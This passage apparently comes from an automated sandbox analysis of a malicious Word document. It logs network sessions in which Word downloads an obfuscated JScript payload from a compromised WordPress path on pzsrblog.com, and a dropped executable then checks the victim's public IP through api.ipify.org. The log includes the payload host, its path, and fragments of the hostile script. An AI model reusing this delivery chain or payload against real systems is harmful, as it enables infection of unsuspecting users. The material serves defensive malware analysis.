d8 8c fe 17 73 1a 7e 0c 41 b7 b7 88 d7 55 d5 5c 0f 77 a3 2b 64 06 77 8e 7b Data Ascii: @XYKH~1P~c 1E9@s1{F.;zu=8dXn!6_U'WXc/FFww'LDOs(6U sRW>k=5jx]]vU-.BU3#vr0oDM%ds7$tJWs-!E}Cg+Aws~AU\w+dw{
2022-12-20 13:15:38 UTC	1011	IN	Data Raw: b1 5e 00 cf 6d 9f 18 26 33 80 89 61 63 28 fa f4 00 93 c9 4f d0 48 4b e7 f2 95 50 de ec 19 cf 8b 9f a3 c8 59 ba 87 ea 19 93 31 ed 75 e4 88 d8 04 1e f4 b8 92 61 74 88 9a fa 74 14 4c a3 58 5e 6a 41 fd be 99 88 5e 5b c4 8c a8 1c 3c 27 ae 47 7a 46 1d 7f ff ee 67 e5 ef 4e 74 0e 98 f0 6e d6 07 86 15 86 13 e0 f2 93 e7 fb 16 fc f7 01 eb 18 3c 80 ea 89 b1 a8 2c 98 c4 bf ac 21 48 d5 9a 63 25 3b 8c 4b c9 d3 b8 e2 f9 8b 32 cf be dc bd 7d 8c 7d db ff d2 2c ff 85 37 31 f9 58 ac 0f 22 b5 7e 27 9f d7 ce 62 bb 20 21 ef ab 35 a2 e7 fe 9c ea 11 36 b4 df 4a 22 a0 cc 93 a8 47 32 3c 16 5a cf 85 90 04 3a 66 e7 33 f6 f4 65 16 96 07 73 a3 de 01 77 95 4c bc 1c 97 51 7e 3b 8f 36 fb e3 1c f7 d9 87 a2 a4 01 c6 42 fd e9 2c 19 47 6b f4 79 2c b5 de 31 fe f7 5d 2e dc d8 c0 ed 9b 02 d1 7c Data Ascii: ^m&3ac(OHKPY1uattLX^jA^[<'GzFgNtn<,!Hc%;K2}},71X"~'b !56J"G2<Z:f3eswLQ~;6B,Gky,1].\|
2022-12-20 13:15:38 UTC	1027	IN	Data Raw: a9 f1 4c c6 7c f1 01 0e 1a 9e 41 da 63 1d 8b 66 8b 21 f9 6b 22 89 82 62 59 60 78 99 09 5e 6d 3c 59 23 20 d3 ee 8b 2c 8b 0d 22 7b 79 5f 74 de 0d 16 2c 71 22 aa c9 df 69 32 51 41 6e f9 1a d4 bb 96 50 fd 30 9e 5c d1 54 84 1a b4 91 b8 36 8b 1c ed ff fd e0 fb 03 e4 ed a6 33 e2 fc 3d 34 72 74 50 48 15 e6 df f3 49 a8 0f ba 49 e9 ab eb a8 16 fc a0 21 41 96 0a 93 7c 6e 79 47 53 78 2e 96 0f 1d 8d cc f3 34 c3 ef ba 3d 33 f4 e7 21 92 ea c2 2d a5 41 8c d6 99 ce eb e7 2b 89 c9 be c4 d3 ab 25 dc b8 1b 0b 3f 82 58 da 7b 92 5d 1a e9 78 fe 73 41 f8 6c 10 ee 52 b1 98 0e 2c a0 f7 cf 14 1e 9d 0b c3 6e fc 77 96 d4 06 a0 b4 b2 97 ad 5e fe 8c 37 79 49 a4 20 1c 3f ff 9e c3 e1 bd 7e 5c 5c f1 86 a2 87 92 f4 ce 9c 42 b4 aa 35 9e e2 cd 28 0a be e6 1f 43 64 b9 11 d6 c4 43 83 2d 14 05 Data Ascii: L\|Acf!k"bY`x^m<Y# ,"{y_t,q"i2QAnP0\T63=4rtPHII!A\|nyGSx.4=3!-A+%?X{]xsAlR,nw^7yI ?~\\B5(CdC-
2022-12-20 13:15:38 UTC	1043	IN	Data Raw: fe 43 72 be 3f e6 f7 3b 78 19 b6 85 ce 0b 2e 64 e5 4d a4 b4 47 8f 82 94 42 fe b6 19 91 9c f2 1e c5 ec 42 62 4e 9d e5 e1 15 5b d4 dc 2d 28 0a 48 63 d1 af 78 ae 24 98 e1 ef ec c6 cc fb 51 d8 65 ed 61 6f df e1 18 c7 8c 21 24 f9 26 93 95 e4 d8 d9 47 8d 89 5f 82 d9 d1 b0 90 d2 e1 26 a8 3c dd c0 7b a5 7f 54 6d ad e7 f7 91 1b 9c 1a b9 9e b3 4e 97 b8 26 f8 f5 bc d5 9e 5f 49 d3 39 37 e6 0a 9f 76 0e 64 43 4b 24 b9 96 69 dc 57 ea c5 eb b1 30 43 bd d4 d8 71 da 83 be 6a f6 ec b1 33 20 a7 cf 18 24 07 c9 50 b6 3a 8b a8 b5 12 5c fd f8 9a aa f6 db 4c 1c de 45 6d 77 22 ed 3b 9d 79 54 b7 81 ea 0b 69 c8 1f af e5 c9 34 43 5e 17 b4 31 68 a2 0e a3 c4 33 d9 99 70 09 f5 31 53 89 d8 93 c6 11 c1 5d 2f 9d d9 97 79 52 13 31 9b fd 9a a0 d0 65 88 d9 ab f3 fa 40 37 db 4a 32 58 f7 f0 13 Data Ascii: Cr?;x.dMGBBbN[-(Hcx$Qeao!$&G_&<{TmN&_I97vdCK$iW0Cqj3 $P:\LEmw";yTi4C^1h3p1S]/yR1e@7J2X
2022-12-20 13:15:38 UTC	1059	IN	Data Raw: 6e 21 af f9 25 1d fd 12 71 1d 12 ca 80 41 8e 4c 2e 3a c3 e6 b1 df 78 e2 71 09 83 65 ca 5c 8c 1f cb eb 8b 8d 7c ec 1e c3 b3 d9 69 54 be 33 a7 37 7a 16 d3 db 4b b8 f8 6a 34 e2 31 83 a8 15 cc 54 e4 8a 2a a2 54 44 38 72 48 93 8e c9 eb 29 34 b4 a4 6a ac 25 cc 3e 86 cd fd bf fc 16 ea 4b a8 e5 01 8e 8d 1e 86 c5 d0 e9 f8 ae b1 e7 ee bb 7d ac f0 90 44 6e b5 17 39 c9 91 18 1e fa 43 c2 0c 07 c6 aa ee 64 91 c8 07 7e bc 78 c4 b0 03 cf 05 7b ef 40 f3 ea 55 28 35 4e fe ef 07 ec e9 8a 2a 26 a9 5c 61 5b d0 7a 16 84 2f c6 e4 43 13 15 ef 4c 69 16 28 ab 4f ec 69 ce dc ce a6 ec 67 1a 8e 52 e1 bc 12 ff c8 e7 da cb 34 c4 0d e0 98 f8 07 f4 de 98 30 e1 51 1b d3 5b 76 53 d4 e8 82 db 92 d9 7c d6 1a 22 d0 dc 71 fc cb 7f 8c e2 fb e7 2c 4d aa 20 41 d7 9a 37 93 b3 e9 a3 d0 c0 65 8d 1c Data Ascii: n!%qAL.:xqe\\|iT37zKj41TTD8rH)4j%>K}Dn9Cd~x{@U(5N&\a[z/CLi(OigR40Q[vS\|"q,M A7e
2022-12-20 13:15:38 UTC	1075	IN	Data Raw: 13 72 26 75 6c 4c 13 14 99 77 1b 3b 5d e7 61 f7 eb 39 e7 4c 44 b0 17 e8 f8 47 f1 03 84 17 d7 a2 d7 2b 86 ee c5 c7 1c 37 97 20 5f 5d 85 d5 f2 a2 68 1e 8c e0 d0 f4 4a 3e 7e 7f c2 e4 03 31 e4 7e b1 25 eb b1 3a 9f a7 6f 43 74 85 d9 ff bd 7c b6 23 47 9d 40 a3 3f 8c da 36 1d 2b c5 5b 5c 18 22 c4 e1 e6 6b 0c b5 95 60 5c 98 26 f3 cd 06 63 2a 71 95 f0 f1 b6 0c 58 bb 1f 6b 25 65 24 04 9a 7b 3d f0 16 11 f2 4d 68 b4 26 63 e5 75 98 e9 37 0c 98 f9 fa 23 0b 0a af b3 61 97 11 1d 6d 2f 79 e7 1d cd b3 5d 73 99 fa b1 14 23 d5 85 3c 57 88 47 62 67 04 4e c6 2e e4 de f0 e5 e2 5a 59 76 15 b4 f0 f4 61 08 43 ef dd 66 6d 1f 37 4a c5 ce d3 3d 7b 26 c6 47 ec 88 2d f1 c3 b0 e4 1e 6b 4a fe d1 3c 6c 26 27 23 03 10 7a 2a 81 a4 48 31 2b 4e bc a7 4e af 12 ed 9a 2c 66 ad bc 4f e9 de 48 ee Data Ascii: r&ulLw;]a9LDG+7 _]hJ>~1~%:oCt\|#G@?6+[\"k`\&cqXk%e${=Mh&cu7#am/y]s#<WGbgN.ZYvaCfm7J={&G-kJ<l&'#zH1+NN,fOH
2022-12-20 13:15:38 UTC	1091	IN	Data Raw: 04 99 5d 06 7c 89 b3 c2 20 5d 82 95 91 8f d1 d7 ce 64 e7 a1 30 0c 8d 6f d2 f8 a0 99 b3 4d ee 6c df 70 8c 5b 27 56 12 98 bc 88 9a a2 49 78 ce b8 c1 89 45 c1 38 2d 98 42 ab f6 77 fc 5e 06 f0 38 7a 32 53 c2 74 29 c9 df 45 f8 c1 1b bc a9 6a a0 66 ff 41 96 4e fe 8d b2 59 09 4a cf cb d8 91 bf 17 45 a5 89 ec 19 35 80 d2 ce 60 36 d5 0f 25 c8 d9 9a c4 6f 0e 64 78 bd c5 d9 2e 06 f1 59 07 18 b3 d0 95 a1 32 b3 59 3a 64 1b f7 ec 0f f1 e8 80 15 cf cf 19 71 7c e3 6e 1e ef 71 a2 da ac 1f c3 f4 93 91 2d 2e 46 7a c0 51 b6 25 07 b3 63 f5 1b 5c b6 cc a1 70 71 24 fb 44 a7 92 32 4d 89 23 1b 8a 98 5f 93 00 2f 2d 38 23 77 83 5b 03 6e b3 db e7 09 1a 52 51 4c 9e 92 c5 81 c3 7f 04 8d f3 32 5b 56 7c 45 ea f2 01 36 5a c9 33 5a 5c d0 24 a5 56 31 e8 32 1c bd e0 c5 cb c2 3c 5a 86 a7 d2 Data Ascii: ]\| ]d0oMlp['VIxE8-Bw^8z2St)EjfANYJE5`6%odx.Y2Y:dq\|nq-.FzQ%c\pq$D2M#_/-8#w[nRQL2[V\|E6Z3Z\$V12<Z
2022-12-20 13:15:38 UTC	1107	IN	Data Raw: 1d ab d3 d9 b5 ea 15 fe d4 a2 63 f5 19 f9 b6 73 b4 ef ff 4b 4d 40 27 e9 27 4e 60 7a 59 9b 82 5e cb b9 14 e3 49 d3 29 03 82 e6 2e c1 2e 3e 09 8f 8b c6 d8 0f 0a e1 d9 e8 67 0c f5 e9 41 b9 5a 17 cb 8e 3d 22 38 6c 3d e5 b5 05 18 dd 38 83 65 ae d0 7a ad 33 69 76 16 61 80 60 fb c5 03 9e 72 a0 3b 91 bf e1 92 b4 0a 4d 6c a9 6b 16 7b 5d a7 0b 5c 19 46 c8 83 68 86 0c af e1 d7 8f 0e 7e e7 96 91 73 e1 0a da a6 ab b9 33 73 3d 99 bd 67 b0 45 eb 24 93 55 3e f1 f8 a2 08 af 5f 94 52 7f e8 2a 47 4c a6 30 4a 7f 13 d5 2a bd c8 94 ad e2 f6 af 18 46 ee 1e 87 9c cb 5e 9c fc 87 11 dd fc ff c1 f7 c1 ce ba fe 95 85 d5 4b 09 76 ea 8b b8 85 14 36 d9 5f 18 a3 0d ae 8f 75 59 11 f9 88 50 ed 1c 6c ce 4d a1 ed 62 35 b2 6f ea e8 9a bd 9a c2 42 71 8c a3 32 f9 be 7a 11 73 3e 68 70 64 74 3f Data Ascii: csKM@''N`zY^I)..>gAZ="8l=8ez3iva`r;Mlk{]\Fh~s3s=gE$U>_RGL0JF^Kv6_uYPlMb5oBq2zs>hpdt?
2022-12-20 13:15:38 UTC	1123	IN	Data Raw: 89 1f c8 6f c4 0f e4 87 4c ae e2 1b f9 ad f8 41 00 5c b1 70 39 2a 7e 18 00 9e f0 18 e3 47 81 f8 2b 21 bb c7 2b 1e da 05 e0 79 0b 92 3f 1a 00 97 0d 78 5e 9f b8 fc 8e 56 41 f5 f7 05 01 be 44 7f 16 08 98 14 d2 ad 4f c7 9d 1e ab 10 f8 af 2b 45 7c 12 93 df 81 10 68 95 87 bf d3 f2 5b d2 6a 15 c5 b7 f2 07 01 70 53 03 a0 5c ff a5 f7 66 00 e4 e6 e6 22 00 fe 31 21 00 26 d8 00 38 6a 24 0d 42 80 f8 72 27 e1 dd 2e 2e bb 0f 04 f7 b9 3b f9 21 bd 87 df ea bb 8a 4f e9 43 42 f1 c3 83 7c 4e 7e 88 0e 9c f8 0a 64 8a ca 7f 59 09 e5 87 f4 84 f2 43 e4 d4 00 40 75 f5 c5 27 9e f4 3e a9 01 70 3d 40 0f 06 e2 f9 0b 0a 80 88 f8 0e 6c 43 6a 00 5c 09 78 7d f9 55 79 61 29 04 ba 2b e1 e3 f2 15 35 92 b6 d9 e2 5e 67 c0 9d 43 a0 d5 d2 ab f2 2c 24 6f b5 ea 73 2b 7e 48 4b 04 00 69 51 88 00 58 Data Ascii: oLA\p9*~G+!+y?x^VADO+E\|h[jpS\f"1!&8j$Br'..;!OCB\|N~dYC@u'>p=@lCj\x}Uya)+5^gC,$os+~HKiQX
2022-12-20 13:15:38 UTC	1139	IN	Data Raw: fc 2b 10 d5 54 ff 86 a8 d2 46 7a 8f 79 21 15 7a e6 c8 84 fc 9d 89 e2 fb b4 e8 33 53 6a 0c df a9 c7 0e 38 84 30 e2 b3 fa 93 50 7a 65 61 02 76 7d 03 b4 fd fa 95 58 a2 01 40 99 21 7e 20 bc 93 3e 8d f0 49 b2 3b e2 b2 df 49 fa 19 5e 95 f7 24 f7 29 58 78 30 cd c2 8a 3f e9 5a 20 7e b5 09 51 ca f6 d9 28 2f f5 5b 90 28 bd cf c0 d9 1b a4 44 a7 1c 48 6f e5 57 e9 43 f1 ab aa f4 00 d2 57 45 a5 af ea 8d ed 8d f4 00 c2 13 5f fc 6a 81 f4 56 7c 4f fe ea 2a 7d 28 be ca 8f 6a af 50 fa be 90 9e 50 7a b6 f7 16 d3 ea 1b 6a f5 8a d1 03 01 d0 b1 e0 00 d8 bb 77 6f d1 0d 80 6d db b6 15 a2 03 b0 01 c0 ff 3f 8f ea 6f 48 95 bf 11 51 f1 01 86 00 2a be 95 bf a1 23 db 17 df c8 1f 04 80 02 e1 bd 00 68 04 d1 b5 fd 0f 40 00 e4 62 dd 22 54 f7 d9 9f 48 03 88 fa 0c db 75 08 df d0 13 9e 34 70 Data Ascii: +TFzy!z3Sj80Pzeav}X@!~ >I;I^$)Xx0?Z ~Q(/[(DHoWCWE_jV\|O}(jPPzjwom?oHQ#h@b"THu4p
2022-12-20 13:15:38 UTC	1155	IN	Data Raw: b2 15 6b 64 d9 f2 f4 e4 2d 5d 79 d8 6e 4a 66 ca 4c 99 e9 9b 9e d6 ae df f8 c5 ba 4d 90 7d 13 44 07 6b 36 d8 4a be 1e ac 23 ac e2 1b 84 df db 5f b5 76 3d 80 e4 60 c5 da b5 b2 62 8d 61 f9 6a b0 6a ad e4 93 95 6b 0c 2b 56 83 55 92 bf bc 60 16 2f 5d 76 d5 6e 4a 66 ca 4c 99 e9 9b 9e 56 ac 5a fb df 57 b1 4d 5f 0b 50 d9 57 ae d9 00 d6 43 6c b0 9a d8 af ee a2 b2 2f 03 f9 a8 ec 0a 2a 7b fe f2 d5 c2 af f3 e6 29 ab 24 97 2c 5b 29 b9 f9 2b 85 df f2 cb c9 bb 33 8b b3 f3 ff d9 6e 4a 66 ca 4c 99 e9 9b 9c b2 b3 b3 ff 0f 54 ea ff ad 2d bb d7 aa e7 2f 03 f9 a8 e0 1e 4b 21 75 1e 81 d8 b9 4b 57 48 6e de 0a c9 c9 25 cb 25 3b 07 64 93 65 b2 24 20 5f 16 2f 59 7a 47 e6 2d cc fe df 7d fb f6 cd 7c 19 28 33 65 a6 6f 7a 5a b5 6e 5d 7d ad da 20 67 19 41 55 5e 06 a9 f3 57 48 b6 65 c9 Data Ascii: kd-]ynJfLM}Dk6J#_v=`bajjk+VU`/]vnJfLVZWM_PWCl/*{)$,[)+3nJfLT-/K!uKWHn%%;de$ _/YzG-}\|(3eozZn]} gAU^WHe
2022-12-20 13:15:38 UTC	1171	IN	Data Raw: 49 6e 66 6f 07 6e 75 6d 49 6e 66 6f 0c 64 61 74 65 54 69 6d 65 49 6e 66 6f 08 63 61 6c 65 6e 64 61 72 0a 6d 5f 64 61 74 61 49 74 65 6d 09 63 75 6c 74 75 72 65 49 44 06 6d 5f 6e 61 6d 65 11 6d 5f 75 73 65 55 73 65 72 4f 76 65 72 72 69 64 65 00 03 03 03 03 03 00 00 01 00 01 20 53 79 73 74 65 6d 2e 47 6c 6f 62 61 6c 69 7a 61 74 69 6f 6e 2e 43 6f 6d 70 61 72 65 49 6e 66 6f 1d 53 79 73 74 65 6d 2e 47 6c 6f 62 61 6c 69 7a 61 74 69 6f 6e 2e 54 65 78 74 49 6e 66 6f 25 53 79 73 74 65 6d 2e 47 6c 6f 62 61 6c 69 7a 61 74 69 6f 6e 2e 4e 75 6d 62 65 72 46 6f 72 6d 61 74 49 6e 66 6f 27 53 79 73 74 65 6d 2e 47 6c 6f 62 61 6c 69 7a 61 74 69 6f 6e 2e 44 61 74 65 54 69 6d 65 46 6f 72 6d 61 74 49 6e 66 6f 1d 53 79 73 74 65 6d 2e 47 6c 6f 62 61 6c 69 7a 61 74 69 6f 6e 2e 43 Data Ascii: InfonumInfodateTimeInfocalendarm_dataItemcultureIDm_namem_useUserOverride System.Globalization.CompareInfoSystem.Globalization.TextInfo%System.Globalization.NumberFormatInfo'System.Globalization.DateTimeFormatInfoSystem.Globalization.C

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49724	64.185.227.156	443	C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:16:30 UTC	1179	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Host: api.ipify.org Connection: Keep-Alive
2022-12-20 13:16:30 UTC	1179	IN	HTTP/1.1 200 OK Content-Length: 11 Content-Type: text/plain Date: Tue, 20 Dec 2022 13:16:30 GMT Vary: Origin Connection: close
2022-12-20 13:16:30 UTC	1179	IN	Data Raw: 38 34 2e 31 37 2e 35 32 2e 33 38 Data Ascii: 84.17.52.38

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49727	64.185.227.156	443	C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:16:50 UTC	1179	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Host: api.ipify.org Connection: Keep-Alive
2022-12-20 13:16:50 UTC	1179	IN	HTTP/1.1 200 OK Content-Length: 11 Content-Type: text/plain Date: Tue, 20 Dec 2022 13:16:50 GMT Vary: Origin Connection: close
2022-12-20 13:16:50 UTC	1179	IN	Data Raw: 38 34 2e 31 37 2e 35 32 2e 33 38 Data Ascii: 84.17.52.38

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49703	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:14:29 UTC	2	OUT	OPTIONS /wp-content/uploads/ HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: pzsrblog.com
2022-12-20 13:14:30 UTC	2	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Dec 2022 13:14:30 GMT Content-Type: text/html; charset=utf-8 Content-Length: 19268 Connection: close Server: LiteSpeed last-modified: Tue, 25 Jan 2022 07:44:20 GMT etag: "4b44-61efaa54-78a64b804597b561;;;" accept-ranges: bytes x-turbo-charged-by: LiteSpeed
2022-12-20 13:14:30 UTC	2	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49704	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:14:31 UTC	3	OUT	GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: pzsrblog.com Connection: Keep-Alive
2022-12-20 13:14:31 UTC	4	IN	HTTP/1.1 200 OK Date: Tue, 20 Dec 2022 13:14:31 GMT Content-Length: 8032 Connection: close Server: LiteSpeed cache-control: public, max-age=1 expires: Tue, 20 Dec 2022 13:14:32 GMT last-modified: Tue, 20 Dec 2022 05:25:57 GMT accept-ranges: bytes vary: Accept-Encoding x-turbo-charged-by: LiteSpeed
2022-12-20 13:14:31 UTC	4	IN	Data Raw: 3c 21 44 4f 43 74 59 70 65 20 48 54 4d 4c 3e 0d 0a 0d 0a 3c 48 54 4d 4c 3e 0d 0a 0d 0a 3c 42 6f 44 59 3e 0d 0a 0d 0a 3c 53 43 72 49 50 74 20 74 59 50 45 3d 22 74 45 78 54 2f 6a 73 63 72 69 50 74 22 3e 0d 0a 0d 0a 2f 2f 68 30 64 5a 7a 78 61 58 6d 64 61 66 48 6c 58 30 70 65 5a 33 5a 36 4b 64 55 5a 5a 4a 57 55 7a 6f 35 79 49 6d 68 69 59 73 32 33 6b 79 33 51 62 66 53 31 66 35 51 63 68 75 59 6a 37 5a 32 33 78 71 42 34 72 58 31 75 54 63 4d 57 78 4b 75 36 74 71 6b 65 46 78 34 77 71 36 37 62 6f 66 4b 58 55 51 74 5a 55 4f 4d 4a 30 6c 65 4c 50 47 46 5a 34 61 63 70 53 41 77 73 51 45 36 52 6e 36 70 66 46 5a 38 6a 4b 71 37 69 6e 4f 70 6e 45 4b 54 61 6f 75 78 6f 53 46 52 43 35 4c 51 59 45 51 75 48 73 4c 6e 72 57 52 68 74 56 55 6d 39 61 33 31 78 6c 72 66 75 50 6a 78 67 Data Ascii: <!DOCtYpe HTML><HTML><BoDY><SCrIPt tYPE="tExT/jscriPt">//h0dZzxaXmdafHlX0peZ3Z6KdUZZJWUzo5yImhiYs23ky3QbfS1f5QchuYj7Z23xqB4rX1uTcMWxKu6tqkeFx4wq67bofKXUQtZUOMJ0leLPGFZ4acpSAwsQE6Rn6pfFZ8jKq7inOpnEKTaouxoSFRC5LQYEQuHsLnrWRhtVUm9a31xlrfuPjxg

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49705	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:14:32 UTC	12	OUT	HEAD /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: pzsrblog.com Connection: Keep-Alive
2022-12-20 13:14:33 UTC	12	IN	HTTP/1.1 200 OK Date: Tue, 20 Dec 2022 13:14:32 GMT Content-Length: 8032 Connection: close Server: LiteSpeed cache-control: public, max-age=1 expires: Tue, 20 Dec 2022 13:14:33 GMT last-modified: Tue, 20 Dec 2022 05:25:57 GMT accept-ranges: bytes vary: Accept-Encoding x-turbo-charged-by: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49706	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:14:33 UTC	12	OUT	OPTIONS /wp-content/uploads/2012/ HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: pzsrblog.com
2022-12-20 13:14:34 UTC	12	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Dec 2022 13:14:34 GMT Content-Type: text/html; charset=utf-8 Content-Length: 19268 Connection: close Server: LiteSpeed last-modified: Tue, 25 Jan 2022 07:44:20 GMT etag: "4b44-61efaa54-78a64b804597b561;;;" accept-ranges: bytes x-turbo-charged-by: LiteSpeed
2022-12-20 13:14:34 UTC	13	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49707	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:14:35 UTC	14	OUT	HEAD /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-IDCRL_ACCEPTED: t Host: pzsrblog.com
2022-12-20 13:14:35 UTC	14	IN	HTTP/1.1 200 OK Date: Tue, 20 Dec 2022 13:14:35 GMT Content-Length: 8032 Connection: close Server: LiteSpeed cache-control: public, max-age=1 expires: Tue, 20 Dec 2022 13:14:36 GMT last-modified: Tue, 20 Dec 2022 05:25:57 GMT accept-ranges: bytes vary: Accept-Encoding x-turbo-charged-by: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49708	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:14:36 UTC	14	OUT	OPTIONS /wp-content/uploads/ HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: pzsrblog.com
2022-12-20 13:14:36 UTC	15	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Dec 2022 13:14:36 GMT Content-Type: text/html; charset=utf-8 Content-Length: 19268 Connection: close Server: LiteSpeed last-modified: Tue, 25 Jan 2022 07:44:20 GMT etag: "4b44-61efaa54-78a64b804597b561;;;" accept-ranges: bytes x-turbo-charged-by: LiteSpeed
2022-12-20 13:14:36 UTC	15	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 Data Ascii: 